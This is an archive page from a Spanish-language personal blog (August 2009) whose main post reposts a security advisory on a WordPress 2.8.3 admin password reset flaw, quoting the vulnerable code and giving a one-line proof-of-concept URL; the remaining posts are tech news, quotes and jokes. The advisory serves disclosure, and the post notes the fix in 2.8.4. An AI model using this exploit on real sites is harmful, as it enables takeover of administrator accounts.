user-avatar
Today is Domingo
20 mayo, 2012

Archives: agosto 2009

11 agosto, 2009

Vulnerabilidad WordPress 2.8.x

by admin — Categories: Seguridad, wordpress — Tags: , , Comentarios desactivados

Va un copy&paste de la vulnerabilidad, descubierta por Laurent Gaffié :

============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

"

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:

http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=

The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch aviable for the moment.

VIII. REFERENCES
-------------------------

http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]
WordPress Trac

Update: actualizar WordPress a versión 2.8.4
government,politics news,politics news,politics

9 agosto, 2009

Ataques DDoS a Twitter, Facebook, Youtube y LiveJournal

El Hacktivismo ha vuelto, los especialistas en seguridad creen que el DDos que afectó seriamente a Twitter (en menor medida a Facebook, Youtube  y LiveJournal) fue cometido por hackers rusos.

Fue un ataque personalizado, en contra de un blogger Pro-Georgiano (Cyxymu).

Se sabe que suelen armar las botnets con Pcs zombies (preferentemente su S.O es Windows por su poca seguridad) y teniendo control de estos equipos coordinan los ataques. El usuario promedio no sabe de vulnerabilidades, firewalls, malware, solo quiere su porno, sus redes sociales y que su correo funcionen, no importa como. Esta ignorancia y el mal asesoramiento hacen que cada vez sea mas fácil cometer estos ataques.

botnet-cycle

Todos hablan de estos ataques pero nadie menciona como podemos protegernos (evitando que nuestras pcs se conviertan en zombies) como usuarios comunes, recomiendo leer los sgtes. links de la wikepedia (no muerde):

Se vienen tiempos violentos…

government,politics news,politics news,politics

7 agosto, 2009

Wikimedia / Richard Stallman en Argentina

by admin — Categories: GNU, Richard Stallman, Wiki — Tags: , 2 Comments

Richard Stallman, el gurú del software Libre, estará en Argentina para participar de la 5ta. Conferencia Internacional de los Proyectos de Wikimedia. No voy a poder estar (y es la segunda vez que me lo pierdo a Stallman). Del 26 al 28 de Agosto pueden ver a este Señor en el Centro Cultural San Martín.

¿Qué es wikimedia?

La Fundación Wikimedia es una organización sin fines de lucro creada en Estados Unidos. Entre otras actividades, es la entidad que opera y mantiene proyectos colaborativos como Wikipedia, Wikcionario, Wikiquote, Wikilibros, Wikisource, Wikimedia Commons, Wikiespecies, Wikinoticias y Wikiversidad.

180px-Wikimedia_Foundation_RGB_logo

He sido colaborador de Wikipedia en algún momento y deje porque me agotaron las guerras de edición (ojo, no estoy diciendo que sirvan o no).

government,politics news,politics news,politics

7 agosto, 2009

Frases de ayer y hoy IV

by admin — Categories: Frases de ayer y hoy — Tags: Leave a comment

La palabra crea o destruye. Por eso es necesario pensar varias veces lo que vamos a decir, ya que criticar y destruir es muy sencillo. Pero construir con cada palabra exige activar lo mejor de nosotros mismos.

Autor: nose

government,politics news,politics news,politics

6 agosto, 2009

Frases de ayer y hoy III

by admin — Categories: Frases de ayer y hoy — Tags: , Leave a comment

First they ignore you, then they ridicule you, then they fight you, then you win.

Usualmente atribuida a Mahatma Gandhi

government,politics news,politics news,politics

5 agosto, 2009

Preguntas a un blogger

by admin — Categories: blogger, Blogósfera, boludeces — Tags: , , 4 Comments

Diálogo entre un amigo (no blogger) y yo:

Amigo: ¿Sos blogger?

Yo: Mas o menos

Amigo: ¿Te lleva mucho tiempo escribir?

Yo: Mas o menos.

Amigo: ¿Sos famoso?

Yo: No, algunos famosos son Fabio, Eduardo Arcos, Conz, Federico Picone, Marina Torchiari, Inti, etc

Amigo: ¿te pagan o haces dinero con tu blog?

Yo: No.

Amigo: Ah, entonces no debe haber mucha competencia…

Yo: …

government,politics news,politics news,politics

4 agosto, 2009

Risa incontenible de Eric Hartman (Boemerang)

by admin — Categories: epic fail, videos — Tags: , 3 Comments

Ya se que este video es viejo, pero me acordé y bue…

httpv://www.youtube.com/watch?v=bWKfyRPf8gM

Update: al final era una joda para el programa Belga llamado “In De Gloria”

government,politics news,politics news,politics

3 agosto, 2009

Ovejeros aburridos/highlanders get bored

by admin — Categories: Videos Cool! — Tags: , , , Leave a comment

government,politics news,politics news,politics

2 agosto, 2009

Comments

Los invito a comentar, no sean tímidos, de paso fíjense el poder de IntenseDebate, otra creación genial de Matt Mullenweg

government,politics news,politics news,politics

1 agosto, 2009

Frases de ayer y hoy II

by admin — Categories: Frases de ayer y hoy — Tags: Leave a comment

Guárdate del buey por el frente, del burro por detrás, y de la mujer por todos los lados.

government,politics news,politics news,politics
© 2012 /dev/null All rights reserved - Wallow theme v0.46.5 by ([][]) TwoBeers - Powered by WordPress - Have fun!
Follow me